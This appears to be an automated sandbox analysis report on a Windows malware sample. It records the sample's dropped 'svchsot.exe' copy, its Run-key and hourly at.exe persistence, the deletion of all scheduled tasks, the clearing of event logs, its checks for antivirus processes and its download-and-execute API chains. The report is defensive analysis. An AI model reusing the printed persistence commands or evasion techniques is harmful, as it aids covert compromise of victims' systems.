          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 22:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 23:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 24:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeJump to behavior
          Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 start "Task Scheduler"Jump to behavior
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exe | Section loaded: apphelp.dll
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exe | Section loaded: wininet.dll
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exe | Section loaded: avicap32.dll
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exe | Section loaded: msvfw32.dll
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exe | Section loaded: winmm.dll
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exe | Section loaded: urlmon.dll
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exe | Section loaded: iertutil.dll
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exe | Section loaded: srvcli.dll
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exe | Section loaded: netutils.dll
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exe | Section loaded: msvcp60.dll
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exe | Section loaded: netapi32.dll
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exe | Section loaded: samcli.dll
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exe | Section loaded: wtsapi32.dll
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exe | Section loaded: mswsock.dll
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exe | Section loaded: napinsp.dll
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exe | Section loaded: pnrpnsp.dll
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exe | Section loaded: wshbth.dll
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exe | Section loaded: nlaapi.dll
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exe | Section loaded: iphlpapi.dll
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exe | Section loaded: dnsapi.dll
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exe | Section loaded: winrnr.dll
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exe | Section loaded: ntmarta.dll
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exe | Section loaded: rasadhlp.dll
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exe | Section loaded: fwpuclnt.dll
          Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: cmdext.dll
          Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: kernel.appcore.dll
          Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: taskschd.dll
          Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: sspicli.dll
          Source: C:\Windows\SysWOW64\net.exe | Section loaded: mpr.dll
          Source: C:\Windows\SysWOW64\net.exe | Section loaded: wkscli.dll
          Source: C:\Windows\SysWOW64\net.exe | Section loaded: netutils.dll
          Source: C:\Windows\SysWOW64\net.exe | Section loaded: samcli.dll
          Source: C:\Windows\SysWOW64\net.exe | Section loaded: srvcli.dll
          Source: C:\Windows\SysWOW64\net.exe | Section loaded: iphlpapi.dll
          Source: C:\Windows\SysWOW64\net1.exe | Section loaded: samcli.dll
          Source: C:\Windows\SysWOW64\net1.exe | Section loaded: netutils.dll
          Source: C:\Windows\SysWOW64\net1.exe | Section loaded: dsrole.dll
          Source: C:\Windows\SysWOW64\net1.exe | Section loaded: srvcli.dll
          Source: C:\Windows\SysWOW64\net1.exe | Section loaded: wkscli.dll
          Source: C:\Windows\SysWOW64\net1.exe | Section loaded: logoncli.dll
          Source: C:\Windows\SysWOW64\net1.exe | Section loaded: cryptbase.dll
          Source: C:\Windows\SysWOW64\at.exe | Section loaded: schedcli.dll
          Source: C:\Windows\SysWOW64\at.exe | Section loaded: netutils.dll
          Source: C:\Windows\SysWOW64\at.exe | Section loaded: sspicli.dll
          Source: C:\Windows\SysWOW64\at.exe | Section loaded: msv1_0.dll
          Source: C:\Windows\SysWOW64\at.exe | Section loaded: ntlmshared.dll
          Source: C:\Windows\SysWOW64\at.exe | Section loaded: cryptdll.dll
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe | Section loaded: apphelp.dll
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe | Section loaded: wininet.dll
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe | Section loaded: avicap32.dll
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe | Section loaded: msvfw32.dll
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe | Section loaded: winmm.dll
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe | Section loaded: urlmon.dll
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe | Section loaded: iertutil.dll
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe | Section loaded: srvcli.dll
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe | Section loaded: netutils.dll
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe | Section loaded: msvcp60.dll
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe | Section loaded: netapi32.dll
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe | Section loaded: samcli.dll
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe | Section loaded: wtsapi32.dll
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exe | Code function: 0_2_00401301 IsBadReadPtr,LoadLibraryA,GetProcAddress, 0_2_00401301
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exe | Code function: 0_2_00404620 push eax; ret 0_2_0040464E
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exe | Code function: 0_2_100699B0 push eax; ret 0_2_100699DE
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exe | Code function: 0_2_100FAA45 push edi; ret 0_2_100FAA46
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exe | Code function: 0_2_10026E51 push cs; ret 0_2_10026E52
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe | Code function: 32_2_100699B0 push eax; ret 32_2_100699DE
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe | Code function: 32_2_100FAA45 push edi; ret 32_2_100FAA46
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe | Code function: 32_2_10026E51 push cs; ret 32_2_10026E52

          Persistence and Installation Behavior

          Source: unknown | Executable created and started: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exe | Code function: 0_2_10001A20 GetSystemDirectoryA,wsprintfA,wsprintfA,CreateFileA,CloseHandle,Sleep,Sleep,FindFirstFileA,GetCurrentDirectoryA,strstr,Sleep,GetVersionExA,GetSystemDefaultLCID,Sleep,Sleep,Sleep,GetLocalTime,wsprintfA,_mkdir,Sleep,GetModuleFileNameA,CopyFileA,wsprintfA,wsprintfA,BeginUpdateResourceA,UpdateResourceA,EndUpdateResourceA,CloseHandle,Sleep,ShellExecuteA,Sleep,GetWindowsDirectoryA,wsprintfA,wsprintfA,_mkdir,_mkdir,_mkdir,_mkdir,URLDownloadToFileA,Sleep,ShellExecuteA,ShellExecuteA,Sleep,URLDownloadToFileA,Sleep,ShellExecuteA,Sleep,URLDownloadToFileA,Sleep,ShellExecuteA, 0_2_10001A20
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exe | File created: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe

          Boot Survival

          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /delete /tn * /f
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exe | Code function: 0_2_10010E20 OpenSCManagerA,OpenServiceA,QueryServiceStatus,ControlService,Sleep,DeleteService,RegDeleteKeyA,OpenSCManagerA,OpenServiceA,StartServiceA,CloseServiceHandle,OpenSCManagerA,OpenServiceA,LockServiceDatabase,OpenSCManagerA,OpenServiceA,LockServiceDatabase,OpenSCManagerA,OpenServiceA,ControlService,CloseServiceHandle,OpenSCManagerA,OpenServiceA,LockServiceDatabase,ChangeServiceConfigA,UnlockServiceDatabase,CloseServiceHandle,CloseServiceHandle,Sleep, 0_2_10010E20
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run XXXXXX579E5A5B VVVVVVrr2unw==
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\sc.exe sc config Schedule start= auto
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exe | Code function: 0_2_1000A660 OpenEventLogA,ClearEventLogA,OpenEventLogA,ClearEventLogA,CloseEventLog, 0_2_1000A660
          Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          Source: C:\Users\user\Desktop\ILQ18dgzMU.exe | Code function: 0_2_10002410 0_2_10002410
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe | Code function: 32_2_10002410 32_2_10002410
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exe | Code function: 0_2_10001800 in eax, dx 0_2_10001800
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exe | Stalling execution: Execution stalls by calling Sleep graph_0-19370
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exe | Code function: 0_2_100018A0 wsprintfA,CreateToolhelp32Snapshot,Process32First,_strcmpi,GetCurrentProcessId,OpenProcess,GetModuleFileNameExA,K32GetModuleFileNameExA,_strcmpi,CloseHandle,Process32Next,CloseHandle, 0_2_100018A0
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exe | Code function: OpenSCManagerA,OutputDebugStringA,LocalAlloc,LocalAlloc,EnumServicesStatusA,LocalAlloc,lstrlen,LocalAlloc,OpenServiceA,LocalAlloc,QueryServiceConfigA,lstrcat,lstrcat,lstrcat,lstrcat,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,LocalSize,LocalReAlloc,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,CloseServiceHandle,LocalFree,CloseServiceHandle,LocalReAlloc, 0_2_100108F0
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe | Code function: OpenSCManagerA,OutputDebugStringA,LocalAlloc,LocalAlloc,EnumServicesStatusA,LocalAlloc,lstrlen,LocalAlloc,OpenServiceA,LocalAlloc,QueryServiceConfigA,lstrcat,lstrcat,lstrcat,lstrcat,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,LocalSize,LocalReAlloc,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,CloseServiceHandle,LocalFree,CloseServiceHandle,LocalReAlloc, 32_2_100108F0
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exe | Thread delayed: delay time: 180000
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exe | Window / User API: threadDelayed 1194
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exe | Window / User API: threadDelayed 379
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exe | Window / User API: threadDelayed 7127
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exe | Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec) graph_0-19219
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exe | Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep graph_0-19396
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe | Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe | API coverage: 1.5 %
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exe | Code function: 0_2_10002410 0_2_10002410
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe | Code function: 32_2_10002410 32_2_10002410
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exe TID: 7388 | Thread sleep count: 1194 > 30
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exe TID: 7388 | Thread sleep time: -214920000s >= -30000s
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exe TID: 7400 | Thread sleep count: 379 > 30
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exe TID: 7388 | Thread sleep count: 7127 > 30
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exe TID: 7388 | Thread sleep time: -1282860000s >= -30000s
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exe | Code function: 0_2_10001A20 GetSystemDirectoryA,wsprintfA,wsprintfA,CreateFileA,CloseHandle,Sleep,Sleep,FindFirstFileA,GetCurrentDirectoryA,strstr,Sleep,GetVersionExA,GetSystemDefaultLCID,Sleep,Sleep,Sleep,GetLocalTime,wsprintfA,_mkdir,Sleep,GetModuleFileNameA,CopyFileA,wsprintfA,wsprintfA,BeginUpdateResourceA,UpdateResourceA,EndUpdateResourceA,CloseHandle,Sleep,ShellExecuteA,Sleep,GetWindowsDirectoryA,wsprintfA,wsprintfA,_mkdir,_mkdir,_mkdir,_mkdir,URLDownloadToFileA,Sleep,ShellExecuteA,ShellExecuteA,Sleep,URLDownloadToFileA,Sleep,ShellExecuteA,Sleep,URLDownloadToFileA,Sleep,ShellExecuteA, 0_2_10001A20
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exe | Code function: 0_2_100014B0 GetSystemDirectoryA,FindFirstFileA,CreateFileA,ReadFile,wsprintfA,wsprintfA,CloseHandle,wsprintfA,lstrlen,lstrlen,wsprintfA,lstrlen, 0_2_100014B0
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exe | Code function: 0_2_10008880 wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA, 0_2_10008880
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exe | Code function: 0_2_10009090 FindFirstFileA,FindClose,CreateFileA,CloseHandle, 0_2_10009090
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exe | Code function: 0_2_10008CE0 lstrlen,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,??2@YAPAXI@Z,??3@YAXPAX@Z,wsprintfA,FindNextFileA,FindClose, 0_2_10008CE0
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exe | Code function: 0_2_100086B0 LocalAlloc,wsprintfA,FindFirstFileA,LocalReAlloc,lstrlen,FindNextFileA,LocalFree,FindClose, 0_2_100086B0
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exe | Code function: 0_2_10008FD0 FindFirstFileA,FindClose,FindClose, 0_2_10008FD0
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe | Code function: 32_2_10008880 wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA, 32_2_10008880
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe | Code function: 32_2_10009090 FindFirstFileA,FindClose,CreateFileA,CloseHandle, 32_2_10009090
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe | Code function: 32_2_10001A20 GetSystemDirectoryA,wsprintfA,wsprintfA,CreateFileA,CloseHandle,Sleep,Sleep,FindFirstFileA,GetCurrentDirectoryA,strstr,Sleep,GetVersionExA,GetSystemDefaultLCID,Sleep,Sleep,Sleep,GetLocalTime,wsprintfA,_mkdir,Sleep,GetModuleFileNameA,CopyFileA,wsprintfA,wsprintfA,BeginUpdateResourceA,UpdateResourceA,EndUpdateResourceA,CloseHandle,Sleep,ShellExecuteA,Sleep,GetWindowsDirectoryA,wsprintfA,wsprintfA,_mkdir,_mkdir,_mkdir,_mkdir,URLDownloadToFileA,Sleep,ShellExecuteA,ShellExecuteA,Sleep,URLDownloadToFileA,Sleep,ShellExecuteA,Sleep,URLDownloadToFileA,Sleep,ShellExecuteA, 32_2_10001A20
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe | Code function: 32_2_100014B0 GetSystemDirectoryA,FindFirstFileA,CreateFileA,ReadFile,wsprintfA,wsprintfA,CloseHandle,wsprintfA,lstrlen,lstrlen,wsprintfA,lstrlen, 32_2_100014B0
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe | Code function: 32_2_10008CE0 lstrlen,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,??2@YAPAXI@Z,??3@YAXPAX@Z,wsprintfA,FindNextFileA,FindClose, 32_2_10008CE0
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe | Code function: 32_2_100086B0 LocalAlloc,wsprintfA,FindFirstFileA,LocalReAlloc,lstrlen,FindNextFileA,LocalFree,FindClose, 32_2_100086B0
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe | Code function: 32_2_10008FD0 FindFirstFileA,FindClose,FindClose, 32_2_10008FD0
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exe | Code function: 0_2_100084F0 GetLogicalDriveStringsA,GetVolumeInformationA,SHGetFileInfo,lstrlen,lstrlen,lstrlen,GetDiskFreeSpaceExA,GetDriveTypeA,lstrlen, 0_2_100084F0
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exe | Code function: 0_2_10001600 Sleep,GetTickCount,GetVersionExA,getsockname,GetSystemInfo,GlobalMemoryStatus, 0_2_10001600
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exe | Thread delayed: delay time: 180000
          Source: ILQ18dgzMU.exe, 00000000.00000002.4082758555.000000000047E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllV
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exe | API call chain: ExitProcess graph end node graph_0-19979
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exe | API call chain: ExitProcess graph end node graph_0-19987
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exe | API call chain: ExitProcess graph end node graph_0-20003
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exe | API call chain: ExitProcess graph end node graph_0-20000
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exe | API call chain: ExitProcess graph end node graph_0-19337
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exe | API call chain: ExitProcess graph end node graph_0-19679
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe | API call chain: ExitProcess graph end node
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe | API call chain: ExitProcess graph end node
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe | API call chain: ExitProcess graph end node
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exe | Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exe | Code function: 0_2_1000F8D0 SendMessageA,SystemParametersInfoA,Sleep,SystemParametersInfoA,SendMessageA,SystemParametersInfoA,SendMessageA,BlockInput,BlockInput, 0_2_1000F8D0
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exe | Code function: 0_2_100018A0 wsprintfA,CreateToolhelp32Snapshot,Process32First,_strcmpi,GetCurrentProcessId,OpenProcess,GetModuleFileNameExA,K32GetModuleFileNameExA,_strcmpi,CloseHandle,Process32Next,CloseHandle, 0_2_100018A0
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exe | Code function: 0_2_00401301 IsBadReadPtr,LoadLibraryA,GetProcAddress, 0_2_00401301
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exe | Code function: 0_2_00401000 VirtualAlloc,VirtualAlloc,VirtualAlloc,GetProcessHeap,HeapAlloc,VirtualAlloc,VirtualAlloc, 0_2_00401000
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exe | Code function: 0_2_1000F9D0 mouse_event,SetCursorPos,WindowFromPoint,SetCapture,MapVirtualKeyA,keybd_event,MapVirtualKeyA,keybd_event,mouse_event,mouse_event, 0_2_1000F9D0
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /delete /tn * /fJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc config Schedule start= autoJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net start "Task Scheduler"Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 0:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 1:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 2:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 3:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 4:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 5:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 6:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 7:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 8:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 9:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 10:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 11:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 12:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 13:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 14:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 15:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 16:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 17:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 18:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 19:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 20:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 21:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 22:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 23:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 24:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeJump to behavior
          Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 start "Task Scheduler"Jump to behavior
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_10026D20 cpuid 0_2_10026D20
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_10001A20 GetSystemDirectoryA,wsprintfA,wsprintfA,CreateFileA,CloseHandle,Sleep,Sleep,FindFirstFileA,GetCurrentDirectoryA,strstr,Sleep,GetVersionExA,GetSystemDefaultLCID,Sleep,Sleep,Sleep,GetLocalTime,wsprintfA,_mkdir,Sleep,GetModuleFileNameA,CopyFileA,wsprintfA,wsprintfA,BeginUpdateResourceA,UpdateResourceA,EndUpdateResourceA,CloseHandle,Sleep,ShellExecuteA,Sleep,GetWindowsDirectoryA,wsprintfA,wsprintfA,_mkdir,_mkdir,_mkdir,_mkdir,URLDownloadToFileA,Sleep,ShellExecuteA,ShellExecuteA,Sleep,URLDownloadToFileA,Sleep,ShellExecuteA,Sleep,URLDownloadToFileA,Sleep,ShellExecuteA,0_2_10001A20
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_10007200 LookupAccountNameA,IsValidSid,Sleep,LoadLibraryA,GetProcAddress,FreeLibrary,0_2_10007200
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_00401D21 EntryPoint,GetVersion,GetCommandLineA,GetStartupInfoA,GetModuleHandleA,0_2_00401D21
          Source: ILQ18dgzMU.exe, ILQ18dgzMU.exe, 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmp, svchsot.exe, svchsot.exe, 00000020.00000002.1733553944.000000001007A000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: kxetray.exe
          Source: ILQ18dgzMU.exe, ILQ18dgzMU.exe, 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmp, svchsot.exe, svchsot.exe, 00000020.00000002.1733553944.000000001007A000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: KSafeTray.exe
          Source: ILQ18dgzMU.exe, ILQ18dgzMU.exe, 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmp, svchsot.exe, svchsot.exe, 00000020.00000002.1733553944.000000001007A000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: 360tray.exe

Stealing of Sensitive Information

Source: Yara match | File source: dump.pcap, type: PCAP
Source: Yara match | File source: 00000000.00000002.4082870617.00000000007A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.3947674150.0000000000780000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.3090838933.0000000002150000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000020.00000002.1733553944.000000001007A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
